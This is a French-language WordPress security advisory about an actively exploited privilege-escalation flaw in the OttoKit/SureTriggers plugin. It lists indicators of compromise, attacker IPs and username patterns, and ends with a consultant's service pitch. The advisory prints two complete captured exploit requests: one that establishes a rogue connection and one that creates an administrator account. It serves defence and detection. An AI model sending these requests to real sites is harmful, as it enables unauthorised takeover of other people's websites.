Le 2 mai 2025, l’équipe de Wordfence Threat Intelligence a ajouté une nouvelle vulnérabilité critique à sa base de données, concernant le plugin OttoKit: All-in-One Automation Platform (anciennement SureTriggers). Cette vulnérabilité, divulguée publiquement par un CNA tiers le 30 avril 2025, permet à des attaquants non authentifiés d’obtenir un accès administrateur à des sites vulnérables, notamment ceux qui n’ont jamais utilisé de mot de passe d’application ni connecté OttoKit/SureTriggers avec un tel mot de passe. Les attaquants authentifiés avec un mot de passe d’application valide peuvent également exploiter cette faille. Un grand merci à Denver Jackson pour avoir découvert et signalé cette vulnérabilité de manière responsable.
D’après nos enregistrements, les attaquants ont commencé à exploiter activement cette vulnérabilité dès le 2 mai 2025. Nous avons bloqué au moins une requête malveillante, et l’exploitation massive a débuté le 4 mai 2025. Le pare-feu Wordfence a déjà bloqué plus de 2 400 tentatives d’exploitation ciblant cette vulnérabilité.
Tous les clients Wordfence Premium, Wordfence Care et Wordfence Response ont reçu une règle de pare-feu pour se protéger contre toute exploitation de cette vulnérabilité le 2 mai 2025. Les sites utilisant la version gratuite de Wordfence bénéficieront de la même protection 30 jours plus tard, le 1er juin 2025.
Le développeur d’OttoKit: All-in-One Automation Platform a collaboré avec l’équipe de WordPress.org pour effectuer une mise à jour forcée, de sorte que la majorité des sites devraient déjà exécuter la version corrigée du plugin, 1.0.83. Je vous encourage vivement à vérifier immédiatement que votre site utilise la dernière version corrigée et à le mettre à jour sans délai si ce n’est pas le cas, car cette vulnérabilité est activement exploitée.
Détails de la Vulnérabilité
Le plugin OttoKit: All-in-One Automation Platform pour WordPress est vulnérable à une élévation de privilèges dans toutes les versions jusqu’à la 1.0.82 incluse. Cela est dû à l’absence de vérification des capacités dans la fonction create_wp_connection() et à une vérification insuffisante des informations d’authentification de l’utilisateur. Cela permet à des attaquants non authentifiés d’établir une connexion, rendant possible une élévation de privilèges.
Note supplémentaire : Cette vulnérabilité peut être exploitée dans deux scénarios. Le premier est lorsque le site n’a jamais activé ou utilisé de mot de passe d’application, et qu’OttoKit/SureTriggers n’a jamais été connecté au site avec un mot de passe d’application. Dans ce cas, un attaquant peut exploiter cette vulnérabilité sans connaître de nom d’utilisateur valide. Le second scénario est lorsque l’attaquant a un accès authentifié au site et peut générer un mot de passe d’application valide.
Indicateurs de Compromission
Les indicateurs de compromission les plus courants incluent des tentatives d’exploitation de la vulnérabilité de connexion initiale pour établir une connexion avec le site, puis créer un compte utilisateur administrateur via le point de terminaison d’automatisation/action.
Les acteurs malveillants semblent également tenter d’exploiter la CVE-2025-3102, ce qui nous amène à penser qu’ils testent les deux vulnérabilités récemment divulguées pour voir si un site est vulnérable à l’une ou l’autre. Il est possible de distinguer les exploits ciblant la CVE-2025-3102 de ceux ciblant la CVE-2025-27007, car un en-tête St-Authorization vide sera présent dans les tentatives d’exploitation ciblant la CVE-2025-3102.
Exemple de Requête Initiale
POST /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, br
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Host: [redacted]
Referer: www.google.com
User-Agent: OttoKit
Cache-Control: max-age=0
X-Forwarded-For: 144.91.119.115
Upgrade-Insecure-Requests: 1
Cf-Ray: 93ac255d5d18e98c-FRA
Cf-Visitor: {\"scheme\":\"https\"}
X-Forwarded-Proto: https
Cdn-Loop: cloudflare; loops=1
Cf-Connecting-Ip: 144.91.119.115
Cf-Ipcountry: FR
Content-Type: application/json
Content-Length: 17
{\"sure-triggers-access-key\": \"[redacted]\", \"wp-password\": \"[redacted]\", \"connection_status\": \"ok\", \"wp-username\": \"wp_owsr\", \"connected_email\": \"[redacted]\"}
Exemple de Requête de Création d’Admin
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, br
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Host: [redacted]
Referer: www.google.com
User-Agent: OttoKit
Cache-Control: max-age=0
X-Forwarded-For: 144.91.119.115
St-Authorization: [redacted]
Upgrade-Insecure-Requests: 1
Cf-Ray: 93ac25620c2ed36e-FRA
Cf-Visitor: {\"scheme\":\"https\"}
X-Forwarded-Proto: https
Cdn-Loop: cloudflare; loops=1
Cf-Connecting-Ip: 144.91.119.115
Cf-Ipcountry: FR
Content-Type: application/x-www-form-urlencoded
Content-Length: 243
selected_options[user_name]=wp_domc&selected_options[user_email]=[redacted]&selected_options[password]=[redacted]&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
IPs Principales Ciblant CVE-2025-3102 et CVE-2025-27007
Les adresses IP suivantes sont actuellement les plus actives dans le ciblage de l’endpoint sure-triggers/v1/connection/create-wp-connection :
- 41.216.188.205 : Plus de 870 requêtes bloquées.
- 144.91.119.115 : Plus de 690 requêtes bloquées.
- 194.87.29.57 : Plus de 500 requêtes bloquées.
- 2a0b:4141:820:1f4::2 : Plus de 200 requêtes bloquées.
- 196.251.69.118 : Plus de 25 requêtes bloquées.
Nous avons également enregistré plus de 731 000 requêtes de cette IP cherchant à accéder à /wp-content/plugins/suretriggers/readme.txt, indiquant qu’il pourrait s’agir d’une IP de reconnaissance.
Les adresses IP suivantes ciblent actuellement l’endpoint wp-json/sure-triggers/v1/automation/action, indiquant une exploitation des deux CVE-2025-3102 et CVE-2025-27007 :
- 107.189.29.12 : Plus de 139 000 requêtes bloquées.
- 205.185.123.102 : Plus de 118 000 requêtes bloquées.
- 198.98.51.24 : Plus de 105 000 requêtes bloquées.
- 198.98.52.226 : Plus de 64 000 requêtes bloquées.
- 199.195.248.147 : Plus de 56 000 requêtes bloquées.
Comptes Utilisateurs Administrateurs
Surveillez les comptes utilisateurs administrateurs créés avec les structures de nom d’utilisateur suivantes. Les attaques provenant des IPs utilisant 144.91.119.115, 41.216.188.205 et 196.251.69.118 tentent de créer des comptes administrateurs avec le format de nom d’utilisateur ‘wp_’ suivi de quatre lettres aléatoires. Voici quelques variantes d’exemple :
- wp_pfuq
- wp_rvus
- wp_uvge
Les attaques provenant des IPs 194.87.29.57 et 2a0b:4141:820:1f4::2 tentent de créer des noms d’utilisateur de 12 caractères comme ceux-ci, préfixés par xtw18387 :
- xtw18387e9db
- xtw18387becc
- xtw18387cc91
Les attaques provenant des IPs 107.189.29.12, 199.195.248.147 et 205.185.123.102 tentent de créer des noms d’utilisateur administrateurs de 14 caractères préfixés par admin_ suivis de caractères alphanumériques aléatoires :
- admin_iw0ag5sx
- admin_o1etqaj6
- admin_7h1vq7d7
Les attaques provenant des IPs 198.98.51.24 et 198.98.52.226 tentent de créer des noms d’utilisateur administrateurs de 13 caractères préfixés par test_ suivis de caractères alphanumériques aléatoires :
- test_iajt388i
- test_z0vrl03m
- test_24l6eap4
Trafic des Journaux d’Accès
Les endpoints REST API suivants peuvent avoir des requêtes d’accès dans les journaux :
/wp-json/sure-triggers/v1/connection/create-wp-connection?rest_route=sure-triggers/v1/connection/create-wp-connection
Après l’exploitation réussie de l’endpoint /connection/create-wp-connection, les attaquants tentent d’injecter des comptes utilisateurs administrateurs en accédant aux endpoints suivants. Ces endpoints indiquent également que les attaquants ciblent la CVE-2025-3102.
/wp-json/sure-triggers/v1/automation/action?rest_route=sure-triggers/v1/automation/action
Conseils et services pour protéger votre site WordPress
Face à ce type de menace, il est essentiel d’agir rapidement. En tant qu’experts en réparation d’urgence WordPress, nous proposons une analyse complète, le nettoyage des malwares, la suppression des backdoors et le renforcement de la sécurité. Notre service de maintenance inclut l’installation d’antivirus, les mises à jour régulières, les sauvegardes et une surveillance 24/7, avec option d’hébergement Premium en France. Pour optimiser votre visibilité en ligne, nous offrons des services d’optimisation SEO technique, de stratégie éditoriale et de création de contenus ciblés.
Pour toute question ou besoin d’assistance, n’hésitez pas à me contacter. Je suis là pour vous aider à sécuriser votre site WordPress.
Benjamin Bueno, Expert en Sécurité WordPress chez SécuritéWP.
